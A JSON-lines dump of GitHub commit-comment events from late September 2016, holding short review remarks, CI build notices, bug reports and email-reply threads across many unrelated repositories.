{"id":"4632528273","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19212213,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:29:51Z","updated_at":"2016-09-28T18:29:51Z","body":"Trialed, the string is not empty, but `/`."}},"created_at":"2016-09-28T18:29:51Z"}
{"id":"4632530113","type":"CommitCommentEvent","actor":{"login":"guy4taylor"},"repo":{"name":"guy4taylor/Test"},"payload":{"comment":{"id":19212216,"position":null,"line":null,"path":null,"commit_id":"a387cd638e15fe52b76bad3aa8e6ade3ec61a3e9","created_at":"2016-09-28T18:30:12Z","updated_at":"2016-09-28T18:30:12Z","body":"teswt"}},"created_at":"2016-09-28T18:30:12Z"}
{"id":"4632530422","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19212218,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:30:14Z","updated_at":"2016-09-28T18:30:14Z","body":"Want this change of the test too ?"}},"created_at":"2016-09-28T18:30:14Z"}
{"id":"4632530892","type":"CommitCommentEvent","actor":{"login":"guy4taylor"},"repo":{"name":"guy4taylor/Test"},"payload":{"comment":{"id":19212219,"position":null,"line":null,"path":null,"commit_id":"a387cd638e15fe52b76bad3aa8e6ade3ec61a3e9","created_at":"2016-09-28T18:30:19Z","updated_at":"2016-09-28T18:30:19Z","body":"tgtewtew"}},"created_at":"2016-09-28T18:30:19Z"}
{"id":"4632538385","type":"CommitCommentEvent","actor":{"login":"Mook-as"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19212256,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:31:30Z","updated_at":"2016-09-28T18:31:30Z","body":"Yeah, we shouldn't have random commits lying around that isn't being pointed at by the top level submodule pointer."}},"created_at":"2016-09-28T18:31:30Z"}
{"id":"4632540327","type":"CommitCommentEvent","actor":{"login":"ketersu"},"repo":{"name":"steven7851/livestreamer"},"payload":{"comment":{"id":19212265,"position":null,"line":null,"path":null,"commit_id":"6bbb6cf279096c6c8e90437e72494a663ef7b50e","created_at":"2016-09-28T18:31:50Z","updated_at":"2016-09-28T18:31:50Z","body":"Hi,\r\nThere are something wrong when the channel id is not numbered.\r\nex.\r\n$ livestreamer https://www.douyu.com/wtybill\r\n[cli][info] Found matching plugin douyutv for URL https://www.douyu.com/wtybill\r\nerror: Unable to open URL: http://www.douyu.com/lapi/live/getPlay/wtybill (403 Client Error: Forbidden)\r\n"}},"created_at":"2016-09-28T18:31:50Z"}
{"id":"4632541943","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19212270,"position":4,"line":20,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutex.java","commit_id":"16e8b61f6d27520b951d3733d891fcaf51134d79","created_at":"2016-09-28T18:32:07Z","updated_at":"2016-09-28T18:32:07Z","body":"I approve of this change 💯 % 👍 "}},"created_at":"2016-09-28T18:32:07Z"}
{"id":"4632544404","type":"CommitCommentEvent","actor":{"login":"d-koppenhagen"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19212277,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T18:32:31Z","updated_at":"2016-09-28T18:32:31Z","body":"@fmalcher Zustimmung! Wir sollten es meiner Meinung nach drin lassen"}},"created_at":"2016-09-28T18:32:31Z"}
{"id":"4632544962","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19212280,"position":5,"line":3178,"path":"lib/pf/Switch.pm","commit_id":"5197327d33c813d8cb33a0ee2ec9e4ecfee514ea","created_at":"2016-09-28T18:32:37Z","updated_at":"2016-09-28T18:32:37Z","body":"Was fixed"}},"created_at":"2016-09-28T18:32:37Z"}
{"id":"4632550293","type":"CommitCommentEvent","actor":{"login":"jacksenechal"},"repo":{"name":"eberlitz/splashicon-generator"},"payload":{"comment":{"id":19212304,"position":null,"line":null,"path":null,"commit_id":"7aa8f2f9c330bc5e0a8bcd41bafe5217677e1f61","created_at":"2016-09-28T18:33:33Z","updated_at":"2016-09-28T18:33:33Z","body":"@pke, the .gitattributes file above does exactly that. No change needed in committed bin file."}},"created_at":"2016-09-28T18:33:33Z"}
{"id":"4632567545","type":"CommitCommentEvent","actor":{"login":"jsjlewis96"},"repo":{"name":"jsjlewis96/yeovil-hospital-healthcare"},"payload":{"comment":{"id":19212383,"position":null,"line":null,"path":null,"commit_id":"3d92e6e67315cb4de895c5036984e299ae4ea1f8","created_at":"2016-09-28T18:36:34Z","updated_at":"2016-09-28T18:36:34Z","body":"Nice to know I'm not the only one farting about XD"}},"created_at":"2016-09-28T18:36:34Z"}
{"id":"4632567956","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"aspnet/HttpAbstractions"},"payload":{"comment":{"id":19212384,"position":null,"line":null,"path":null,"commit_id":"067eb9c6f80cd2e50fdf3b3d1af0fbd94ac7bc33","created_at":"2016-09-28T18:36:38Z","updated_at":"2016-09-28T18:36:38Z","body":"👏 "}},"created_at":"2016-09-28T18:36:38Z"}
{"id":"4632568056","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19212385,"position":null,"line":null,"path":null,"commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T18:36:38Z","updated_at":"2016-09-28T18:36:38Z","body":"It's very very likely ;p"}},"created_at":"2016-09-28T18:36:38Z"}
{"id":"4632574726","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19212403,"position":null,"line":null,"path":null,"commit_id":"b07096c840f7c63a87467475ff7b510c8dd68b88","created_at":"2016-09-28T18:37:47Z","updated_at":"2016-09-28T18:37:47Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 280](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1258&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine.Interop\\Xbim.Geometry.Engine.Interop.csproj (new) Build time: 00:24:26"}},"created_at":"2016-09-28T18:37:47Z"}
{"id":"4632575043","type":"CommitCommentEvent","actor":{"login":"Tabrizian"},"repo":{"name":"AoLab/I1820"},"payload":{"comment":{"id":19212405,"position":null,"line":null,"path":null,"commit_id":"4893389f2d9d95520f040818b8d54908c0e06270","created_at":"2016-09-28T18:37:51Z","updated_at":"2016-09-28T18:37:51Z","body":"It seems by updating hash number you want to fakely improve your commits? Yah?!"}},"created_at":"2016-09-28T18:37:51Z"}
{"id":"4632582421","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19212433,"position":null,"line":null,"path":null,"commit_id":"8d4fadb3c88b571a09873bc22009a771333a70ec","created_at":"2016-09-28T18:39:07Z","updated_at":"2016-09-28T18:39:07Z","body":"You're doing great @gregory38. I'm sure you'll nail it ;p"}},"created_at":"2016-09-28T18:39:07Z"}
{"id":"4632583405","type":"CommitCommentEvent","actor":{"login":"schmunk42"},"repo":{"name":"yiisoft/yii2-apidoc"},"payload":{"comment":{"id":19212438,"position":null,"line":null,"path":null,"commit_id":"453d93514005eaa1e5b0ed3cb2b21429e1852383","created_at":"2016-09-28T18:39:18Z","updated_at":"2016-09-28T18:39:18Z","body":"@cebe What's about `nikic/php-parser` - there's a 1.4.1 and 2.1.1 available."}},"created_at":"2016-09-28T18:39:18Z"}
{"id":"4632583866","type":"CommitCommentEvent","actor":{"login":"gevalia"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19212439,"position":null,"line":null,"path":null,"commit_id":"e7fb4e6973bbcf640780e44e18f3c12344460138","created_at":"2016-09-28T18:39:23Z","updated_at":"2016-09-28T18:39:23Z","body":"No. It does not as-is. Writing the code to add a new customer is left to us to do. "}},"created_at":"2016-09-28T18:39:23Z"}
{"id":"4632587108","type":"CommitCommentEvent","actor":{"login":"seh"},"repo":{"name":"hudl/fargo"},"payload":{"comment":{"id":19212449,"position":106,"line":182,"path":"connection.go","commit_id":"c9259b5be1c7cc1ec42b97398b43ac8d1ab8b9fe","created_at":"2016-09-28T18:39:57Z","updated_at":"2016-09-28T18:39:57Z","body":"- [ ] s/Eureke/Eureka/"}},"created_at":"2016-09-28T18:39:57Z"}
{"id":"4632589380","type":"CommitCommentEvent","actor":{"login":"aikar"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19212454,"position":null,"line":null,"path":null,"commit_id":"3d5f59c8553cbf9b79003afa32df6a1527c4b17d","created_at":"2016-09-28T18:40:21Z","updated_at":"2016-09-28T18:40:21Z","body":"Yes, it should."}},"created_at":"2016-09-28T18:40:21Z"}
{"id":"4632594597","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19212471,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T18:41:14Z","updated_at":"2016-09-28T18:41:14Z","body":"develop (evanweaver) - i386-Windows-7-VisualStudio-12: Tests Failed (2174 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.81%25-red.svg)</a> \n"}},"created_at":"2016-09-28T18:41:14Z"}
{"id":"4632596592","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212475,"position":null,"line":null,"path":null,"commit_id":"6374831fc9e0933976599218093a77530f489f63","created_at":"2016-09-28T18:41:36Z","updated_at":"2016-09-28T18:41:36Z","body":"Opps. wrong branch Bart, have done to Krytpon branch and will remove from master."}},"created_at":"2016-09-28T18:41:36Z"}
{"id":"4632603147","type":"CommitCommentEvent","actor":{"login":"mwgeurts"},"repo":{"name":"mwgeurts/mobius_query"},"payload":{"comment":{"id":19212490,"position":null,"line":null,"path":null,"commit_id":"34ff6aa2b1b7367f1d965c632c6f363e31eb37b4","created_at":"2016-09-28T18:42:46Z","updated_at":"2016-09-28T18:42:46Z","body":"Also removed duplicate entries"}},"created_at":"2016-09-28T18:42:46Z"}
{"id":"4632603669","type":"CommitCommentEvent","actor":{"login":"Abrahamh08"},"repo":{"name":"Abrahamh08/Mandelbrot-Set-Generator"},"payload":{"comment":{"id":19212493,"position":null,"line":null,"path":null,"commit_id":"ae1394182bb440858aeadef0dd40242e6e287ee6","created_at":"2016-09-28T18:42:51Z","updated_at":"2016-09-28T18:42:51Z","body":"i failed my precal test cause mandelbrot, i got a 0 on math homework because mandelbrot, now you want me to get a 0 on history qu0z and math hw because of git?"}},"created_at":"2016-09-28T18:42:51Z"}
{"id":"4632608369","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"ImagicalGamer/SurvivalGames"},"payload":{"comment":{"id":19212509,"position":null,"line":null,"path":null,"commit_id":"44a4bc9693510462f1ed0290c22ed54003ba7029","created_at":"2016-09-28T18:43:41Z","updated_at":"2016-09-28T18:43:41Z","body":"XD"}},"created_at":"2016-09-28T18:43:41Z"}
{"id":"4632615948","type":"CommitCommentEvent","actor":{"login":"katie7r"},"repo":{"name":"cuttlesoft/flask-workshop"},"payload":{"comment":{"id":19212534,"position":null,"line":null,"path":null,"commit_id":"1f46a23ca61982129b3cf31c388b242315efc4ab","created_at":"2016-09-28T18:44:59Z","updated_at":"2016-09-28T18:44:59Z","body":"[Flask-Login docs](https://flask-login.readthedocs.io/en/latest/)\r\n\r\nIn this commit:\r\n- Install Flask-Login\r\n- Configure Flask-Login with LoginManager and UserMixin\r\n- Add routes and views for login/logout\r\n- Add template for login view\r\n- Add links and username display to hello_world template"}},"created_at":"2016-09-28T18:44:59Z"}
{"id":"4632616446","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19212541,"position":186,"line":357,"path":"system/keymaps/keyboard.xml","commit_id":"9719da3ea8046d363f3ebf650368ce7ef0838ed3","created_at":"2016-09-28T18:45:04Z","updated_at":"2016-09-28T18:45:04Z","body":"on OSX this switches desktops. I suggest to change the modifier"}},"created_at":"2016-09-28T18:45:04Z"}
{"id":"4632620622","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19212546,"position":4,"line":153,"path":"src/main/scala/main.scala","commit_id":"f8ee99c1c0e2c7c9b5ea9635657f2410d2b24e38","created_at":"2016-09-28T18:45:50Z","updated_at":"2016-09-28T18:45:50Z","body":"😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 😸 "}},"created_at":"2016-09-28T18:45:50Z"}
{"id":"4632620983","type":"CommitCommentEvent","actor":{"login":"phyushin"},"repo":{"name":"mwilke01/HackspaceBadges"},"payload":{"comment":{"id":19212550,"position":null,"line":null,"path":null,"commit_id":"05623bef4db14def6f332bc90f7c5fd46ba70de1","created_at":"2016-09-28T18:45:54Z","updated_at":"2016-09-28T18:45:54Z","body":"wow this is excellent ... way better than my attempt ad c++"}},"created_at":"2016-09-28T18:45:54Z"}
{"id":"4632628906","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19212571,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T18:47:14Z","updated_at":"2016-09-28T18:47:14Z","body":"Re the \"end of stream\" stuff; you could be right. The reason I call ot out\nis that it is an explicitly designed feature of \"foreach\". If it is being\ndropped for considered reasons, then great. I just didn't want it to be\nomitted as an oversight.\n"}},"created_at":"2016-09-28T18:47:14Z"}
{"id":"4632635847","type":"CommitCommentEvent","actor":{"login":"steven7851"},"repo":{"name":"steven7851/livestreamer"},"payload":{"comment":{"id":19212579,"position":null,"line":null,"path":null,"commit_id":"6bbb6cf279096c6c8e90437e72494a663ef7b50e","created_at":"2016-09-28T18:48:27Z","updated_at":"2016-09-28T18:48:27Z","body":"This is the latest version.\r\nhttps://github.com/steven7851/livestreamer/blob/f32bd2635f3987d1b5aea8574a82c76422d06635/src/livestreamer/plugins/douyutv.py"}},"created_at":"2016-09-28T18:48:27Z"}
{"id":"4632637873","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212584,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T18:48:47Z","updated_at":"2016-09-28T18:48:47Z","body":"Speichern funktioniert. Ich hehe dabon aus, das wieder etwas mit euren\nPfaden nicht stimmt. Schau mal ob dirname(__DIR__) den root-pfad richtig\nausgibt.\n\nAm 28.09.2016 19:47 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> Speichern funktioniert leider nicht....\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/dd1e57a7b7bfb61d1354b33735135b2fe9f3d807#commitcomment-19211630>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZEn-J1Ne1DTs3G99CX8rjMMLrF3rks5quqhBgaJpZM4KJHNS>\n> .\n>\n"}},"created_at":"2016-09-28T18:48:47Z"}
{"id":"4632638763","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212589,"position":null,"line":null,"path":null,"commit_id":"6374831fc9e0933976599218093a77530f489f63","created_at":"2016-09-28T18:48:56Z","updated_at":"2016-09-28T18:48:56Z","body":"If you want I can delete the master branch? At least I think I can..."}},"created_at":"2016-09-28T18:48:56Z"}
{"id":"4632640742","type":"CommitCommentEvent","actor":{"login":"DracoMilesX"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19212594,"position":null,"line":null,"path":null,"commit_id":"1d0aad00edb3e961026ceb1fc278a9e9f8772ac5","created_at":"2016-09-28T18:49:17Z","updated_at":"2016-09-28T18:49:17Z","body":"I added OpenSSH on purpose because it allows for easily management if your away and have set it up properly."}},"created_at":"2016-09-28T18:49:17Z"}
{"id":"4632644118","type":"CommitCommentEvent","actor":{"login":"mwilke01"},"repo":{"name":"mwilke01/HackspaceBadges"},"payload":{"comment":{"id":19212607,"position":null,"line":null,"path":null,"commit_id":"05623bef4db14def6f332bc90f7c5fd46ba70de1","created_at":"2016-09-28T18:49:52Z","updated_at":"2016-09-28T18:49:52Z","body":"Thank you - Your work was a good starting point.  I just combined some\nitems and added comments. I was on the fence as to whether or not to put\nthe EEPROM operations in the Badge class, but I think it makes sense in\nthere...\n\nI found a cool Arduino and Circuit simulator: https://circuits.io\nYou can build a circuit using a simulated breadboard (and Arduino) and then\nload code for it to run.  Unfortunately, the code editor only allows a\nsingle file.\n\nI'll send you a link to a simulation I created for the Badge...\n\nMichael\n\nOn Wed, Sep 28, 2016 at 2:45 PM, Paul <notifications@github.com> wrote:\n\n> wow this is excellent ... way better than my attempt ad c++\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mwilke01/HackspaceBadges/commit/05623bef4db14def6f332bc90f7c5fd46ba70de1#commitcomment-19212550>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAcRzg5ozMXIYxGlBP_Tx8UzJZBrWT-Pks5qurXigaJpZM4KJLCl>\n> .\n>\n"}},"created_at":"2016-09-28T18:49:52Z"}
{"id":"4632644979","type":"CommitCommentEvent","actor":{"login":"APeter0807"},"repo":{"name":"EMCECS/ECS-CommunityEdition"},"payload":{"comment":{"id":19212609,"position":null,"line":null,"path":null,"commit_id":"f0b788647dfd7ec7e6c2f810d7b1e5a7d89b1daf","created_at":"2016-09-28T18:50:01Z","updated_at":"2016-09-28T18:50:01Z","body":"Intended commit to `develop`, submitted to wrong branch. These changes for 3.0 are currently pushed to the `develop` branch."}},"created_at":"2016-09-28T18:50:01Z"}
{"id":"4632647291","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19212615,"position":8,"line":11,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"7a2c98c9c1439159487aa8d296471162670a1cb8","created_at":"2016-09-28T18:50:24Z","updated_at":"2016-09-28T18:50:24Z","body":"Teste de comentário."}},"created_at":"2016-09-28T18:50:24Z"}
{"id":"4632650972","type":"CommitCommentEvent","actor":{"login":"jeffjet24"},"repo":{"name":"benpete22/cats"},"payload":{"comment":{"id":19212628,"position":131,"line":147,"path":"index.html","commit_id":"b0d40913ec015f52c600dc2d426b81f2ae1e0392","created_at":"2016-09-28T18:51:03Z","updated_at":"2016-09-28T18:51:03Z","body":"I have found a couple of ways that you can accomplish that:\r\n\r\n- Remove the `btn-group` class from the row div. However, you lose the nice appearance of the buttons being related to one another and then just have 3 separate buttons. \r\n- To maintain the btn-group look, but allow them to span the whole container and use the bootstrap grid stuff properly, I found that you would need to override the bootstrap declaration for `btn-group`. In doing that, remove the `display: inline-block;` attribute, and it then magically uses the whole container.\r\n\r\nI also checked to see if it would cause it to wrap when the screen got smaller, however it did not appear to do so. \r\n"}},"created_at":"2016-09-28T18:51:03Z"}
{"id":"4632651561","type":"CommitCommentEvent","actor":{"login":"mwilke01"},"repo":{"name":"mwilke01/HackspaceBadges"},"payload":{"comment":{"id":19212629,"position":null,"line":null,"path":null,"commit_id":"05623bef4db14def6f332bc90f7c5fd46ba70de1","created_at":"2016-09-28T18:51:09Z","updated_at":"2016-09-28T18:51:09Z","body":"Here it is:\nhttps://circuits.io/circuits/2820013-the-unnamed-circuit/\n\nMichael\n\nOn Wed, Sep 28, 2016 at 2:49 PM, Michael Wilkerson-Barker <\nmwilke01@gmail.com> wrote:\n\n> Thank you - Your work was a good starting point.  I just combined some\n> items and added comments. I was on the fence as to whether or not to put\n> the EEPROM operations in the Badge class, but I think it makes sense in\n> there...\n>\n> I found a cool Arduino and Circuit simulator: https://circuits.io\n> You can build a circuit using a simulated breadboard (and Arduino) and\n> then load code for it to run.  Unfortunately, the code editor only allows a\n> single file.\n>\n> I'll send you a link to a simulation I created for the Badge...\n>\n> Michael\n>\n> On Wed, Sep 28, 2016 at 2:45 PM, Paul <notifications@github.com> wrote:\n>\n>> wow this is excellent ... way better than my attempt ad c++\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/mwilke01/HackspaceBadges/commit/05623bef4db14def6f332bc90f7c5fd46ba70de1#commitcomment-19212550>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AAcRzg5ozMXIYxGlBP_Tx8UzJZBrWT-Pks5qurXigaJpZM4KJLCl>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-28T18:51:09Z"}
{"id":"4632657854","type":"CommitCommentEvent","actor":{"login":"ewiseblatt"},"repo":{"name":"google/citest"},"payload":{"comment":{"id":19212637,"position":15,"line":387,"path":"spinnaker/spinnaker_system/google_smoke_test.py","commit_id":"979c30dcf210b1dc7e74c4da2c6c87054cab06a6","created_at":"2016-09-28T18:52:15Z","updated_at":"2016-09-28T18:52:15Z","body":"why not self.scenario.bindings?\r\n\r\nI try to minimize the use of global_runner. It is a hack that i hope to find a way to get rid of so dont want to add dependencies where they arent needed.\r\nAlso, can you fix the indentation. This will probably have pylint complain.\r\n\r\nI think this might be better\r\n    self.run_test_case(\r\n        GoogleHttp()\r\n        .upsert\r\n"}},"created_at":"2016-09-28T18:52:15Z"}
{"id":"4632661587","type":"CommitCommentEvent","actor":{"login":"myzinsky"},"repo":{"name":"kannoth/DRAMPower"},"payload":{"comment":{"id":19212649,"position":53,"line":53,"path":"memspecs/modified_MICRON_1Gb_DDR3-1600_8bit_G_3s.xml","commit_id":"e8ee102a651e0cadc673a373c9f1cad553c76967","created_at":"2016-09-28T18:52:52Z","updated_at":"2016-09-28T18:52:52Z","body":"should this not be idd0 - Ione?"}},"created_at":"2016-09-28T18:52:52Z"}
{"id":"4632663592","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19212658,"position":32,"line":24,"path":"planet/js/Controller.js","commit_id":"e68e45a25597b1d43d3cafde3ebfb5b637857c99","created_at":"2016-09-28T18:53:14Z","updated_at":"2016-09-28T18:53:14Z","body":"http://qunitjs.com/"}},"created_at":"2016-09-28T18:53:14Z"}
{"id":"4632664626","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212665,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T18:53:25Z","updated_at":"2016-09-28T18:53:25Z","body":"Probier mal die API direkt aufzurufen:\r\n\r\nWww.deine-domain.de/public/api.php/updateAufstellung"}},"created_at":"2016-09-28T18:53:25Z"}
{"id":"4632667091","type":"CommitCommentEvent","actor":{"login":"vegeta897"},"repo":{"name":"Raziaar/aspnetcoreangular"},"payload":{"comment":{"id":19212672,"position":34,"line":43,"path":"src/aspnetcoreangular/package.json","commit_id":"f1f59ee8c44bb092ae7d10130785d1460d4d25a6","created_at":"2016-09-28T18:53:51Z","updated_at":"2016-09-28T18:53:51Z","body":"Crucial!"}},"created_at":"2016-09-28T18:53:51Z"}
{"id":"4632677076","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":19212700,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-28T18:55:35Z","updated_at":"2016-09-28T18:55:35Z","body":"@roderickhsiao @StrikeForceZero per https://github.com/cheeriojs/cheerio/issues/891#issuecomment-250262850 it seems like this isn't actually urgent; it's just a webpack bug."}},"created_at":"2016-09-28T18:55:35Z"}
{"id":"4632677291","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19212701,"position":17,"line":17,"path":"app.py","commit_id":"34402be0b1c1520c1af3ac69d6f673d4a1a7955d","created_at":"2016-09-28T18:55:38Z","updated_at":"2016-09-28T18:55:38Z","body":"Please use UPPERCASE for HTTP methods"}},"created_at":"2016-09-28T18:55:38Z"}
{"id":"4632682376","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212715,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T18:56:32Z","updated_at":"2016-09-28T18:56:32Z","body":"kommt leere Seite"}},"created_at":"2016-09-28T18:56:32Z"}
{"id":"4632683227","type":"CommitCommentEvent","actor":{"login":"anderbubble"},"repo":{"name":"ResearchComputing/RCAMP"},"payload":{"comment":{"id":19212718,"position":11,"line":88,"path":"rcamp/projects/models.py","commit_id":"44759524c1540bfe15e235c1a139dd49541565ca","created_at":"2016-09-28T18:56:40Z","updated_at":"2016-09-28T18:56:40Z","body":"@zebulasampedro It looks like you're trying to improve this so null means time_requested; but this will still use `time_requested` when amount_awarded == 0. You should probably do `if amount_awarded is None` or similar."}},"created_at":"2016-09-28T18:56:40Z"}
{"id":"4632684031","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19212721,"position":32,"line":32,"path":"app.py","commit_id":"34402be0b1c1520c1af3ac69d6f673d4a1a7955d","created_at":"2016-09-28T18:56:49Z","updated_at":"2016-09-28T18:56:49Z","body":"Can you specify port somehow, on which application handles requests. It's needed for docker"}},"created_at":"2016-09-28T18:56:49Z"}
{"id":"4632686748","type":"CommitCommentEvent","actor":{"login":"isaacs"},"repo":{"name":"isaacs/node-graceful-fs"},"payload":{"comment":{"id":19212730,"position":12,"line":39,"path":"test/stats-uid-gid.js","commit_id":"7311ee26993a32186100c205b8802f0cc8e54420","created_at":"2016-09-28T18:57:17Z","updated_at":"2016-09-28T18:57:17Z","body":"Indeed!  Fixed on 6c17a5009ed01c1d58f5b09224977bbcc2679758.  Thanks!"}},"created_at":"2016-09-28T18:57:17Z"}
{"id":"4632687769","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212731,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T18:57:28Z","updated_at":"2016-09-28T18:57:28Z","body":"Du musst in einem anderen Tab eingeloggt sein.\n\nAm 28.09.2016 20:56 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> kommt leere Seite\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/dd1e57a7b7bfb61d1354b33735135b2fe9f3d807#commitcomment-19212715>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZJvlRZ8W4btHmC2IsvJ89FAQv25oks5qurhggaJpZM4KJHNS>\n> .\n>\n"}},"created_at":"2016-09-28T18:57:28Z"}
{"id":"4632688787","type":"CommitCommentEvent","actor":{"login":"kpstraus"},"repo":{"name":"kpstraus/test"},"payload":{"comment":{"id":19212733,"position":null,"line":null,"path":null,"commit_id":"ffe5bb1f284aa7d427f30ae32b9801b8e9694d83","created_at":"2016-09-28T18:57:40Z","updated_at":"2016-09-28T18:57:40Z","body":"\r\n[readme.txt](https://github.com/kpstraus/test/files/499031/readme.txt)\r\n"}},"created_at":"2016-09-28T18:57:40Z"}
{"id":"4632689631","type":"CommitCommentEvent","actor":{"login":"kpstraus"},"repo":{"name":"kpstraus/test"},"payload":{"comment":{"id":19212739,"position":null,"line":null,"path":null,"commit_id":"ffe5bb1f284aa7d427f30ae32b9801b8e9694d83","created_at":"2016-09-28T18:57:49Z","updated_at":"2016-09-28T18:57:49Z","body":"from my system"}},"created_at":"2016-09-28T18:57:49Z"}
{"id":"4632690520","type":"CommitCommentEvent","actor":{"login":"SunyataZero"},"repo":{"name":"peoples-fund/peoples-fund"},"payload":{"comment":{"id":19212743,"position":73,"line":80,"path":"docs/req-spec.md","commit_id":"fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab","created_at":"2016-09-28T18:57:58Z","updated_at":"2016-09-28T18:57:58Z","body":"> A user who has a login is a member and vice versa.\r\n\r\n@frederikfederspiel What happens when a user stops paying? Do they loose their account?"}},"created_at":"2016-09-28T18:57:58Z"}
